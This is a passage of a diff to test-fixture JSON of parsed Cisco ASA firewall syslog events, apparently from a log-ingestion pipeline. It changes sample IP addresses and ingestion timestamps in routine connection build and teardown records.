"100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111737422Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:31:36.363763Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111739111Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:31:36.363769100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111740789Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:31:36.363773600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111742487Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:31:36.363778500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111744117Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:31:36.363783Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111745758Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:31:36.363788200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111747624Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:31:36.363792700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111749322Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:31:36.363797800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111751044Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:31:36.363802900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111752702Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:31:36.363807400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111754358Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:31:36.363812200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111756037Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:31:36.363818300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111757714Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:31:36.363823700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111759363Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:31:36.363828400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111761031Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285", + "ingested": "2021-12-09T13:31:36.363832300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9589,8 +9589,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9625,7 +9625,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9634,8 +9634,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111762647Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", + "ingested": "2021-12-09T13:31:36.363836200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9651,7 +9651,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11807", "source_interface": "outside", "mapped_destination_port": 1281 @@ -9668,8 +9668,8 @@ }, "destination": { "port": 8286, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1282, @@ -9709,7 +9709,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9717,8 +9717,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111764277Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286", + "ingested": "2021-12-09T13:31:36.363841200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9751,8 +9751,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9787,7 +9787,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9796,8 +9796,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111765940Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", + "ingested": "2021-12-09T13:31:36.363845900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9813,7 +9813,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11808", "source_interface": "outside", "mapped_destination_port": 1282 @@ -9830,8 +9830,8 @@ }, "destination": { "port": 8287, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1283, @@ -9871,7 +9871,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9879,8 +9879,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111820442Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287", + "ingested": "2021-12-09T13:31:36.363851500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9913,8 +9913,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9949,7 +9949,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9958,8 +9958,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111823975Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", + "ingested": "2021-12-09T13:31:36.363855800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9975,7 +9975,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11809", "source_interface": "outside", "mapped_destination_port": 1283 @@ -9992,8 +9992,8 @@ }, "destination": { "port": 8288, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1284, @@ -10033,7 +10033,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10041,8 +10041,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111826181Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288", + "ingested": "2021-12-09T13:31:36.363861100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10075,8 +10075,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10111,7 +10111,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10120,8 +10120,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111828200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", + "ingested": "2021-12-09T13:31:36.363865600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10137,7 +10137,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11810", "source_interface": "outside", "mapped_destination_port": 1284 @@ -10159,8 +10159,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10195,7 +10195,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10206,8 +10206,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111830107Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", + "ingested": "2021-12-09T13:31:36.363869300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10244,8 +10244,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10280,7 +10280,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10291,8 +10291,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111831796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", + "ingested": "2021-12-09T13:31:36.363873700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10329,8 +10329,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10365,7 +10365,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10376,8 +10376,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:02.111833539Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", + "ingested": "2021-12-09T13:31:36.363878700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -10409,8 +10409,8 @@ }, "destination": { "port": 8289, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1285, @@ -10450,7 +10450,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10458,8 +10458,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111835195Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289", + "ingested": "2021-12-09T13:31:36.363882900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10492,8 +10492,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10528,7 +10528,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10537,8 +10537,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111836924Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", + "ingested": "2021-12-09T13:31:36.363887500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -10554,7 +10554,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11811", "source_interface": "outside", "mapped_destination_port": 1285 @@ -10571,8 +10571,8 @@ }, "destination": { "port": 8290, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1286, @@ -10612,7 +10612,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -10620,8 +10620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111838570Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290", + "ingested": "2021-12-09T13:31:36.363892300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -10654,8 +10654,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -10690,7 +10690,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -10699,8 +10699,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:02.111840310Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", + "ingested": "2021-12-09T13:31:36.363896900Z", + "original": "Oct 10 2018 12:34:56 localhost 